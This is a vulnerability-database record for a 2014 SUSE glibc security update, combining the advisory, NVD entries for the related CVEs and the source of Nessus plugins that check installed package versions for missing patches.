ID: SUSE-SU-2014:1129-1
Type: suse
Reporter: Suse
Modified: 2014-09-15T19:06:41

Description
This glibc update fixes a critical privilege escalation problem and two
additional issues:

* bnc#892073: An off-by-one error leading to a heap-based buffer
  overflow was found in __gconv_translit_find(). An exploit that
  targets the problem is publicly available. (CVE-2014-5119)
* bnc#836746: Avoid race between {, __de}allocate_stack and
  __reclaim_stacks during fork.
* bnc#844309: Fixed various overflows, reading large /etc/hosts or
  long names. (CVE-2013-4357)
* bnc#894553, bnc#894556: Fixed various crashes on invalid input in
  IBM gconv modules. (CVE-2014-6040, CVE-2012-6656)
{"cve": [{"lastseen": "2019-05-29T18:12:27", "bulletinFamily": "NVD", "description": "iconvdata/ibm930.c in GNU C Library (aka glibc) before 2.16 allows context-dependent attackers to cause a denial of service (out-of-bounds read) via a multibyte character value of \"0xffff\" to the iconv function when converting IBM930 encoded data to UTF-8.", "modified": "2017-07-01T01:29:00", "id": "CVE-2012-6656", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6656", "published": "2014-12-05T16:59:00", "title": "CVE-2012-6656", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:47", "bulletinFamily": "NVD", "description": "GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of \"0xffff\" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.", "modified": "2017-01-03T02:59:00", "id": "CVE-2014-6040", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6040", "published": "2014-12-05T16:59:00", "title": "CVE-2014-6040", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:47", "bulletinFamily": "NVD", "description": "Off-by-one error in the __gconv_translit_find function in gconv_trans.c in GNU C Library (aka glibc) allows context-dependent attackers to cause a denial of service (crash) or execute arbitrary code via vectors related to the CHARSET environment variable and gconv transliteration modules.", "modified": "2017-01-07T03:00:00", "id": "CVE-2014-5119", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5119", "published": "2014-08-29T16:55:00", "title": "CVE-2014-5119", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-03T12:18:13", "bulletinFamily": "scanner", 
"description": "This glibc update fixes a critical privilege escalation problem and\ntwo additional issues :\n\n - bnc#892073: An off-by-one error leading to a heap-based\n buffer overflow was found in __gconv_translit_find(). An\n exploit that targets the problem is publicly available.\n (CVE-2014-5119)\n\n - bnc#836746: Avoid race between {, __de}allocate_stack\n and __reclaim_stacks during fork.\n\n - bnc#844309: Fixed various overflows, reading large\n /etc/hosts or long names. (CVE-2013-4357)\n\n - bnc#894553, bnc#894556: Fixed various crashes on invalid\n input in IBM gconv modules. (CVE-2014-6040,\n CVE-2012-6656)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2014-1129-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83639", "published": "2015-05-20T00:00:00", "title": "SUSE SLES11 Security Update : glibc (SUSE-SU-2014:1129-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2014:1129-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83639);\n script_version(\"2.9\");\n script_cvs_date(\"Date: 2019/09/11 11:22:11\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2013-4357\", \"CVE-2014-5119\", \"CVE-2014-6040\");\n script_bugtraq_id(67992, 68983, 69470, 69472, 69738);\n\n script_name(english:\"SUSE SLES11 Security Update : glibc (SUSE-SU-2014:1129-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", 
\n value:\n\"This glibc update fixes a critical privilege escalation problem and\ntwo additional issues :\n\n - bnc#892073: An off-by-one error leading to a heap-based\n buffer overflow was found in __gconv_translit_find(). An\n exploit that targets the problem is publicly available.\n (CVE-2014-5119)\n\n - bnc#836746: Avoid race between {, __de}allocate_stack\n and __reclaim_stacks during fork.\n\n - bnc#844309: Fixed various overflows, reading large\n /etc/hosts or long names. (CVE-2013-4357)\n\n - bnc#894553, bnc#894556: Fixed various crashes on invalid\n input in IBM gconv modules. (CVE-2014-6040,\n CVE-2012-6656)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=836746\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=844309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=892073\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=894553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=894556\"\n );\n # https://download.suse.com/patch/finder/?keywords=cd8403453563e9d5a949d2219d62a993\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?12c9123b\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6656/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-4357/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.suse.com/security/cve/CVE-2014-5119/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-6040/\"\n );\n # https://www.suse.com/support/update/announcement/2014/suse-su-20141129-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ab20b15d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11 SP2 LTSS :\n\nzypper in -t patch slessp2-glibc-9721\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/29\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! 
preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-devel-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-html-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-i18ndata-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-info-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-locale-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-profile-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"nscd-2.11.3-17.45.53.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n 
tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:18:14", "bulletinFamily": "scanner", "description": "glibc has been updated to fix one security issue and several bugs :\n\nSecurity issue fixed :\n\n - Fix crashes on invalid input in IBM gconv modules\n (CVE-2014-6040, CVE-2012-6656)\n\n - Fixed a stack overflow during hosts parsing\n (CVE-2013-4357)\n\nBugs fixed :\n\n - don", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2015-0164-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83673", "published": "2015-05-20T00:00:00", "title": "SUSE SLES11 Security Update : glibc (SUSE-SU-2015:0164-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0164-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83673);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2019/09/11 11:22:11\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2013-4357\", \"CVE-2014-6040\");\n script_bugtraq_id(67992, 69470, 69472);\n\n script_name(english:\"SUSE SLES11 Security Update : glibc (SUSE-SU-2015:0164-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"glibc has been updated to fix one security issue and several bugs :\n\nSecurity issue fixed :\n\n - Fix crashes on invalid input in IBM gconv modules\n (CVE-2014-6040, CVE-2012-6656)\n\n - Fixed a stack overflow during hosts parsing\n (CVE-2013-4357)\n\nBugs fixed :\n\n - don't touch user-controlled stdio locks in forked 
child\n (bsc#864081, GLIBC BZ #12847)\n\n - Fix infinite loop in check_pf (bsc#909053, GLIBC BZ\n #12926)\n\n - Add check for RTLD_DEEPBIND environment variable to\n disable deepbinding of NSS modules (bsc#888860)\n\n - Fix infinite loop in check_pf (bsc#909053, GLIBC BZ\n #12926)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=844309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=888860\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=894553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=894556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=909053\"\n );\n # https://download.suse.com/patch/finder/?keywords=0d01346ebb9d9e39d1c632f49a85a7ee\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2d6d44bc\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6656/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-4357/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-6040/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150164-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f66ba9d9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command 
listed for your product :\n\nSUSE Linux Enterprise Server 11 SP1 LTSS :\n\nzypper in -t patch slessp1-glibc-10217\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! 
preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"x86_64\", reference:\"glibc-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"s390x\", reference:\"glibc-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"glibc-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"glibc-devel-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"glibc-html-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"glibc-i18ndata-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"glibc-info-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"glibc-locale-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"glibc-profile-2.11.1-0.62.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"nscd-2.11.1-0.62.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-01T02:55:17", "bulletinFamily": "scanner", "description": "Multiple vulnerabilities has been found and corrected in glibc :\n\nWhen converting IBM930 code with iconv(), if IBM930 code which\nincludes invalid multibyte character 0xffff is specified, then iconv()\nsegfaults (CVE-2012-6656).\n\nOff-by-one error in the __gconv_translit_find function in\ngconv_trans.c in GNU C Library (aka glibc) allows context-dependent\nattackers to cause a denial of service (crash) or execute arbitrary\ncode via vectors related to the CHARSET environment variable and gconv\ntransliteration modules (CVE-2014-5119).\n\nCrashes were reported in the IBM code page decoding functions (IBM933,\nIBM935, IBM937, IBM939, IBM1364) (CVE-2014-6040).\n\nThe updated packages have been patched to correct these issues.", "modified": "2019-11-02T00:00:00", "id": "MANDRIVA_MDVSA-2014-175.NASL", "href": "https://www.tenable.com/plugins/nessus/77654", "published": "2014-09-12T00:00:00", "title": "Mandriva Linux Security Advisory : glibc (MDVSA-2014:175)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:175. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77654);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/08/02 13:32:56\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-5119\", \"CVE-2014-6040\");\n script_bugtraq_id(68983, 69470, 69472);\n script_xref(name:\"MDVSA\", value:\"2014:175\");\n\n script_name(english:\"Mandriva Linux Security Advisory : glibc (MDVSA-2014:175)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been found and corrected in glibc :\n\nWhen converting IBM930 code with iconv(), if IBM930 code which\nincludes invalid multibyte character 0xffff is specified, then iconv()\nsegfaults (CVE-2012-6656).\n\nOff-by-one error in the __gconv_translit_find function in\ngconv_trans.c in GNU C Library (aka glibc) allows context-dependent\nattackers to cause a denial of service (crash) or execute arbitrary\ncode via vectors related to the CHARSET environment variable and gconv\ntransliteration modules (CVE-2014-5119).\n\nCrashes were reported in the IBM code page decoding functions (IBM933,\nIBM935, IBM937, IBM939, IBM1364) (CVE-2014-6040).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/oss-sec/2014/q3/485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1135841\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1110\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://sourceware.org/bugzilla/show_bug.cgi?id=14134\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://sourceware.org/bugzilla/show_bug.cgi?id=17325\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-devel-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"glibc-doc-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"glibc-doc-pdf-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-i18ndata-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-profile-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-static-devel-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-utils-2.14.1-12.9.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"nscd-2.14.1-12.9.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, 